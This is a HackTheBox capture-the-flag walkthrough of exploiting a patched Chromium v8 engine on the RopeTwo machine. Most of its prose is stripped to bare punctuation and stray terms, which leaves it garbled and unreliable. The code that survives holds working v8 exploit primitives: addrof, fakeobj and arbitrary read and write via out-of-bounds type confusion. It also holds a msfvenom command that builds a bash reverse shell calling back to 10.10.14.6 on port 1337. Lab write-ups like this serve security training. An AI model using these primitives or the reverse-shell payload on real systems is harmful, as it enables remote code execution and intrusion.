HackTheBox. RopeTwo Walkthrough, Part 1. Chromium v8

It's time to lay out the first raytap for cars from the site HackTheBox .

In this article, we will deal with writing RCE for the patched JavaScript engine v8 , which is now used almost everywhere.

I would like to express special gratitude to Ex0dus and my team. These people helped as much as possible, did not give up and simply supported.

OSINT

nmap'

, 22 . 5000 8000 .

5000 GitLab, login-page'.

8000 , v8.

!

v8

3 : , Chrome ( v8 ) . - XSS :

, . , . , .

GitLab

, v8, .

. API GitLab : %hostname%/api/v4/users/%user_id%



, . , .

, " " - . , e-mail. , GitLab gravatar, md5 e-mail'a . e64c7d89f26bd1972efa854d13d7dd61



, , , e-mail admin@example.com



. , . , .

, GitHub. . , v8 Chrome GitHub 100. ., Chrome.

- v8 . . ,

ArrayGetLastElement



ArraySetLastElement



. (array[len]



). - , (array[len]



). *CTF 2019, oob-v8. - , , JavaScript CTF'a . - :D

Chrome

v8 . v8. - , 64- 32- ( 32 ), 32 , , r13 ( ). JIT- JavaScript.

v8 : smi, double regular. "" . , smi double, double regular. , regular , (, , , ). : smi - 32 , double - 64 , 32. v8, d8 --allow-natives-syntax



. , . - map, , . , - PACKED HOLEY. , length, smi.

, - Chrome PartitionAlloc



, glibc, d8.

, . - - d8, Chrome , , . Ubuntu 18.04 d8. , , , / . , , , .

-

, double- , map'a . type confusion.

v8 - WASM. WebAssembly rwx mmap' v8. , . , 0x68 , , , rwx-, -.

, , , . . - 64- v8, ( 32 )? , , v8. ArrayBuffer 64 .

, DataView, ArrayBuffer . libc, d8 - glibc-, PartitionAlloc Chrome.

builtin- 64- FixedDoubleArray . , double double'.

, 2, FixedDoubleArray 2 , 4. , n, OOB n+1 FixedDoubleArray, 2n+1. type confusion, , .

addrof



2, 1, , - - 2. , map OOB-, map , , . map , , . fakeobj



, .

addrof



fakeobj



:

function addrof(in_obj) {
  obj_arr[0] = in_obj;
  obj_arr.SetLastElement(float_arr_map); // [1.1, 1.2, 1.3, 1.4].GetLastElement()
  let addr = obj_arr[0];
  obj_arr.SetLastElement(obj_arr_map); // [obj1, obj2].GetLastElement()
  return ftoi(addr, 32);
}


function fakeobj(addr) {
  float_arr[0] = itof(addr, 32);
  float_arr.SetLastElement(obj_arr_map);
  let fake = float_arr[0];
  float_arr.SetLastElement(float_arr_map);
  return fake;
}
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

, . -, - . -, 0x8 , map qword. , :

function fakeobj(addr) {
  float_arr[0] = itof(addr, 32);
  float_arr.SetLastElement(obj_arr_map);
  let fake = float_arr[0];
  float_arr.SetLastElement(float_arr_map);
  return fake;
}


var rw_helper = [float_arr_map, 1.1, 2.2, 3.3];
var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;


function arb_read(addr) {
  let fake = fakeobj(rw_helper_addr - 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  return ftoi(fake[0], 64);
}


function arb_write(addr, value) {
  let fake = fakeobj(rw_helper_addr - 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  fake[0] = itof(value, 64);
}
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

, . -. msfvenom:

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.14.6/1337 0>&1"'
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

. / .

netcat , -, , :

ssh- .

, . , 9 . - 3 . - - .

, . - // . . - . . .

P. S. -, - .